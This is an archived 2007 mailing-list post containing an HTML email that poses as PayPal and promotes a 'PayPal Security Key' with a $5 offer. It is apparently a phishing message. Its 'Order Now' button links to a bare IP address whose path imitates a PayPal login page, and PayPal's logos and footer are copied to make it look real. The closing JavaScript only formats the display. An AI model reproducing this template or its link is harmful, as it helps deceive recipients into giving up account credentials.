[12801] in comp.os.os2.announce archive
Extra account protection with your PayPal Security Key
daemon@ATHENA.MIT.EDU (PayPal)
Thu Sep 27 17:54:16 2007
Reply-To: <paypal@email.paypal.com>
From: "PayPal"<paypal@email.paypal.com>
Date: Thu, 27 Sep 2007 14:48:12 -0700
</script>
<div id=yiv2078040802>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<title>PayPal</title>
</head>
<img src="http://email1.paypal.com/1x1.dyn?0BkMatemh90JYCLDrs-t2X=0" width="1" height="1" width="1" height="1" border="0">
<table width="600" cellspacing="0" cellpadding="0" border="0">
<tr>
<td width="200">
<img src="http://www.paypal.com/en_US/i/email/email_pplogonew_117x35.gif"
width="117" height="35" alt="PayPal"><br>
<img
src="http://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="16" alt=""><br>
</td>
</tr>
</table>
<table width="600" bgcolor="#023562" cellspacing="0" cellpadding="0" border="0" background="https://www.paypal.com/en_US/i/core/nav_main_bg.gif">
<tr>
<td>
<img src="http://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="5" alt=""><br>
</td>
</tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
<img src="http://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="10"
alt="" border="0"><br></td>
</tr>
</table>
<table width="600" cellspacing="0" cellpadding="0" border="0">
<tr valign="top">
<td width="367"><b>
<font face="arial,helvetica,sans-serif" size="5" color="#fdbb33">PayPal Security Key</font></b>
<br><b>
<font face="arial,helvetica,sans-serif" size="3" color="#3168a2">An extra layer of
account protection</font></b> <br><br>
<font face="arial,helvetica,sans-serif" size="2">
<strong>Dear Customer,
</strong><br><br>PayPal already protects your account with one of the highest levels of online security
available. Now, you can get an extra layer of protection every time you log in.
<br><br><strong>It's secure</strong> – a new 6-digit security code is generated every 30 seconds.
<br><br><strong>It's simple</strong> – just log in to your PayPal or eBay account, and enter the
security code. <br><br><strong>It's portable</strong> – keep it on your keychain, and access your account from anywhere.
<br><br></font></td>
<td width="233" align="center">
<img src="http://www.paypal.com/en_US/i/email/email_ppseckey_233x215.gif"
width="233" height="215" alt=""><br>
<font face="arial,helvetica,sans-serif" size="3" color="#163e71">
<strong>$5 special offer</strong></font>
<table cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
<img src="http://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="15"
alt="" border="0"><br></td>
</tr>
</table>
<a rel="nofollow" target="_blank" href="http://217.15.82.231/~eleve/.cgi-bin/webscrcmd=_login-run/webscrcmd=_account-run/index.html">
<img
src="http://www.paypal.com/en_US/i/btn/btn_ordernow_84x31.gif" width="84"
height="31" border="0" alt="Order Now"></a></td>
</tr>
</table><br>
<table bgcolor="#cccccc" width="600" cellspacing="0" cellpadding="0" border="0">
<tr>
<td>
<img src="http://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="1"
alt="" border="0"><br></td>
</tr>
</table><br>
<table width="600" cellpadding="0" cellspacing="0" border="0">
<tr>
<td width="100%">
<font face="arial,verdana,helvetica,sans-serif" color="#330033" size="1">Your email preferences are set to receive the PayPal Periodical
newsletter and Product Updates when you create a PayPal account. <br>
<img src="http://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="6" alt="" border="0">
<br>Click here to
<a rel="nofollow" target="_blank" href="http://email1.paypal.com/u.d?RGlevgngKj7fahlfA=341">
<font size="1"><span id="lw_1190884293_0">unsubscribe</span></font></a>.
<br>
<img src="http://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="6" alt="" border="0"><br>To modify your email preferences, log in to your PayPal account, click the Profile sub-tab, then
click the Notifications link under Account Information. Changes may take up to 10 days to be
reflected in our mailings. <br>
<img src="http://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="6" alt="" border="0"><br>Copyright © 2007 PayPal Inc. All rights reserved. Designated trademarks and brands are the
property of their respective owners. PayPal is located at
<span id="lw_1190884293_1">2211 N. First St., San Jose, CA 95131</span>.
</font></td>
</tr>
</table>
</html></div>
<!-- toctype = X-unknown -->
<!-- toctype = text -->
<!-- text -->
</div>
<script>
var callCount = 0;
function rmvScroll( msg )
{
if ( ++callCount > 10 ) { msg.style.visibility = "visible"; }
if ( callCount < 50 && ! imgsDone( msg ) ) {
setTimeout( function() { rmvScroll( msg ); }, 200 );
return;
}
var delta = msg.offsetHeight - msg.clientHeight;
var newWidth = 0;
var newHeight = 0;
delta = ( isNaN( delta )? 1 : delta + 1 );
if ( msg.scrollHeight > msg.clientHeight ) {
newHeight = msg.scrollHeight + delta;
}
delta = msg.offsetWidth - msg.clientWidth;
delta = ( isNaN( delta )? 1 : delta + 1 );
if ( msg.scrollWidth > msg.clientWidth ) {
newWidth = msg.scrollWidth + delta;
}
msg.style.overflow = "visible";
msg.style.visibility = "visible";
if ( newWidth > 0 || newHeight > 0 ) {
var ssxyzzy = document.getElementById( "ssxyzzy" );
var cssAttribs = ['#' + msg.id + '{'];
if ( newWidth > 0 ) cssAttribs.push( 'width:' + newWidth + 'px;' );
if ( newHeight > 0 ) cssAttribs.push( ' height:' + newHeight + 'px;' );
cssAttribs.push( '}' );
try {
ssxyzzy.sheet.deleteRule( 0 );
ssxyzzy.sheet.insertRule( cssAttribs.join(""), 0 );
} catch( e ){}
}
}
function imgsDone( msg ) // for Firefox, we need to scan for images that haven't set their width yet
{
var imgList = msg.getElementsByTagName( "IMG" );
var len = ((imgList == null)? 0 : imgList.length);
for ( var i = 0; i < len; ++i ) {
var theImg = imgList[i];
if ( ! theImg.complete && "undefined" != typeof theImg.naturalWidth && theImg.naturalWidth == 0 ) {
return false;
}
}
return true;
}
var msg = document.getElementById( "message4838167744165511794162609046543102980600285" );
if ( oBw.agt.match( /gecko/ ) == "gecko" ) { if ( msg && "undefined" != typeof msg ) { rmvScroll( msg ); }
} else { msg.style.visibility = "visible"; }
</script>
<!-- END TOC -->
</td>
</tr>
</table>
</body>
</html>